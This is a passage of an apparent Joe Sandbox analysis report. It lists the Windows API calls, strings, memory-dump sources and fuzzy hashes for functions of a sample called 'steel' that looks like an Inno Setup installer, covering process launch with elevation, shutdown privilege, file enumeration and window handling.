                                                                                              • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02122BDC,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                            • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                            • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                            • API String ID: 883996979-221126205
                                                                                            • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                            • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1631623395-0
                                                                                            • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                            • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00418393
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                            • GetWindowRect.USER32(?), ref: 004183CC
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                            • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                            • String ID: ,
                                                                                            • API String ID: 2266315723-3772416878
                                                                                            • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                            • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                            • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CryptVersion
                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                            • API String ID: 1951258720-508647305
                                                                                            • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                            • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                            • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                            • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                            • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                                            • String ID: isRS-$isRS-???.tmp
                                                                                            • API String ID: 134685335-3422211394
                                                                                            • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                            • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                            • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                            • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                            APIs
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                            • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                            Strings
                                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                            • API String ID: 2236967946-3182603685
                                                                                            • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                            • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                            • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                            • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                            • API String ID: 1646373207-3712701948
                                                                                            • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                            • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                            • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                            • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID: ,
                                                                                            • API String ID: 568898626-3772416878
                                                                                            • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                            • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                            • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                            • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                            • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                            • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                            • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                            • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                            • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                            • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                            • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                            • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 1177325624-0
                                                                                            • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                            • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                            • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                            • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 0048397A
                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$IconicLong
                                                                                            • String ID:
                                                                                            • API String ID: 2754861897-0
                                                                                            • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                            • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                            • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                            • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                            • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                            • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241E4
                                                                                            • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                              • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021225AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                            • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
